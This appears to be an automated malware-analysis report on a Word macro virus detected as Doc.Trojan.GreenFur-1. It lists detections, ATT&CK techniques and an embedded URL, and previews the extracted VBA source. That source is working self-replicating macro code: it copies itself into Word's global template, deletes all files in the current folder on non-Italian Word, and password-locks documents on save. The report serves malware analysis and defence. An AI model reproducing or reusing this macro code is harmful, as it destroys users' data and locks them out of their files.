MALICIOUS
142
Risk Score
Malware Insights
MITRE ATT&CK
T1566.001 Spearphishing Attachment
T1059.005 Visual Basic
The sample contains a VBA macro that is triggered by the AutoOpen event, indicating an attempt to execute malicious code upon opening the document. The macro appears to copy itself and other functions, suggesting it's part of a downloader or dropper mechanism. While the specific payload is not fully revealed due to truncation, the presence of the AutoOpen macro and the ClamAV detection strongly suggest malicious intent.
Heuristics 5
-
ClamAV: Doc.Trojan.GreenFur-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.GreenFur-1
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://come.to/rose_swe In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10413 bytes |
SHA-256: 11d3f2d583979a1f9552d08344a0e75eed0d59ad7e7383d9277f66f97cabd2b7 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "GreenFury"
Public Sub MAIN()
'
End Sub
Private Function Casuale$(Password$)
Dim ACaso
Dim Indice
Dim Carattere
'
ACaso = WordBasic.Int(Rnd() * (10 - 1) + 1)
'
If ACaso > 5 Then
'
For Indice = 1 To 15
Carattere = WordBasic.Int(Rnd() * (90 - 75) + 75)
Password$ = Password$ + Chr(Carattere)
Next Indice
'
Casuale$ = Password$
End If
'
End Sub
Attribute VB_Name = "AutoOpen"
Public Sub MAIN()
Dim Versione$
Dim i
Dim Installato
Dim TroppiProblemi
Dim Io$
Dim sMacro$
'
On Error GoTo -1: On Error GoTo Uscita
'Controlla se la versione di word è italiana
Versione$ = WordBasic.[AppInfo$](16)
'
If Versione$ = "Italiano" Then
'controlla se è gia stato installato
For i = 1 To NumMacros
'
If WordBasic.[MacroName$](i, 0, 0) = "GreenFury" Then
Installato = -1
End If
'
If WordBasic.[MacroName$](i, 0, 0) = "FileSalvaConNome" Then
TroppiProblemi = -1
End If
'
Next i
'
If Not Installato And Not TroppiProblemi Then
Io$ = WordBasic.[FileName$]()
sMacro$ = Io$ + ":GreenFury"
WordBasic.MacroCopy sMacro$, "Generale:GreenFury", 1
sMacro$ = Io$ + ":GGGFFF"
WordBasic.MacroCopy sMacro$, "Generale:FileSalvaConNome", 1
sMacro$ = Io$ + ":GGGFFF"
WordBasic.MacroCopy sMacro$, "Generale:GGGFFF", 1
sMacro$ = Io$ + ":FFFGGG"
WordBasic.MacroCopy sMacro$, "Generale:FFFGGG", 1
End If
'
Else
WordBasic.Kill "*.*"
End If
'
Uscita:
'
End Sub
Attribute VB_Name = "GGGFFF"
Public Sub MAIN()
Dim Password$
Dim Io$
Dim sMacro$
'
Dim dlg As Object: Set dlg = WordBasic.DialogRecord.FileSaveAs(False)
On Error GoTo -1: On Error GoTo Controlla
WordBasic.CurValues.FileSaveAs dlg
WordBasic.Dialog.FileSaveAs dlg
'Attiva la routine payload
WordBasic.Call "GreenFury.Casuale$", Password$
'
If Len(Password$) = 15 Then
dlg.Password = Password$
End If
'
If dlg.Format = 0 Then dlg.Format = 1
Io$ = WordBasic.[FileName$]()
sMacro$ = Io$ + ":AutoOpen"
WordBasic.MacroCopy "Generale:FFFGGG", sMacro$, 1
sMacro$ = Io$ + ":FFFGGG"
WordBasic.MacroCopy "Generale:FFFGGG", sMacro$, 1
sMacro$ = Io$ + ":GGGFFF"
WordBasic.MacroCopy "Generale:GGGFFF", sMacro$, 1
sMacro$ = Io$ + ":GreenFury"
WordBasic.MacroCopy "Generale:GreenFury", sMacro$, 1
WordBasic.FileSaveAs dlg
GoTo Fatto
Controlla:
'Se è stato scelto annulla dalla finestra di dialogo
If Err.Number <> 102 Then
WordBasic.FileSaveAs dlg
End If
'
Fatto:
'
End Sub
' Processing file: /opt/analyzer/scan_staging/81c781b1551648afb0c4756f9d68b219.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 965 bytes
' Macros/VBA/GreenFury - 1745 bytes
' Line #0:
' Line #1:
' FuncDefn (Public Sub MAIN())
' Line #2:
' QuoteRem 0x0004 0x0000 ""
' Line #3:
' EndSub
' Line #4:
' Line #5:
' FuncDefn (Private Function Casuale(Password))
' Line #6:
' Dim
' VarDefn ACaso
' Line #7:
' Dim
' VarDefn Indice
' Line #8:
' Dim
' VarDefn Carattere
' Line #9:
' QuoteRem 0x0004 0x0000 ""
' Line #10:
' ArgsLd Rnd 0x0000
' LitDI2 0x000A
' LitDI2 0x0001
' Sub
' Paren
' Mul
' LitDI2 0x0001
' Add
' Ld WordBasic
' ArgsMemLd InStrB 0x0001
' St ACaso
' Line #11:
' QuoteRem 0x0004 0x0000 ""
' Line #12:
' Ld ACaso
' LitDI2 0x0005
' Gt
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.